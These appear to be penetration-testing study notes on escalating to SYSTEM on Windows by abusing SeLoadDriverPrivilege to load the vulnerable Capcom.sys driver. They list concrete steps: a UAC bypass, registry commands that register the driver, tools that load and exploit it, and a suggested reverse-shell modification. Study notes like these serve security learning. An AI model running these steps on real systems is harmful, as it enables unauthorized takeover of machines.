Key Concepts:
SeLoadDriverPrivilege:
The
Print Operatorsgroup grants this privilege, allowing the loading of device drivers.This privilege is often disabled by default and may require a UAC bypass.
Vulnerable Driver (Capcom.sys):
This driver contains a vulnerability allowing arbitrary code execution with SYSTEM privileges.
Registry Manipulation:
Registry keys are used to register the vulnerable driver.
Exploitation:
A custom tool (
ExploitCapcom.exe) is used to exploit the driver and gain SYSTEM access.
Approach, Commands, Tools, and Techniques:
Privilege Check:
whoami /priv(VerifySeLoadDriverPrivilegepresence).If not present, UAC bypass is needed.
UAC Bypass:
UACMe tool.
Administrative command prompt.
Driver Registration:
reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1
Driver Verification:
DriverView.exe(Nirsoft)
Privilege Enablement:
EnableSeLoadDriverPrivilege.exe(Custom tool).
Driver Load Verification:
DriverView.exe(Nirsoft).
Exploitation:
ExploitCapcom.exe(Custom tool).Modify
ExploitCapcom.cppfor reverse shell (if needed).
Automation:
EoPLoadDriver.exe(Automate driver loading).EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys
Cleanup:
reg delete HKCU\System\CurrentControlSet\Capcom
Commands:
whoami /privreg addreg delete
Tools:
UACMe
DriverView.exe (Nirsoft)
cl.exe (Microsoft C++ compiler)
EnableSeLoadDriverPrivilege.exe (Custom tool)
ExploitCapcom.exe (Custom tool)
EoPLoadDriver.exe
Techniques:
Leveraging
SeLoadDriverPrivilege.Exploiting vulnerable drivers.
Registry manipulation.
UAC bypass.
Important Notes:
The
Capcom.sysdriver is a known vulnerable driver.The registry path
HKCU\System\CurrentControlSetis not usable on windows 10 1803 and later.Always be very cautious when loading drivers.
Last updated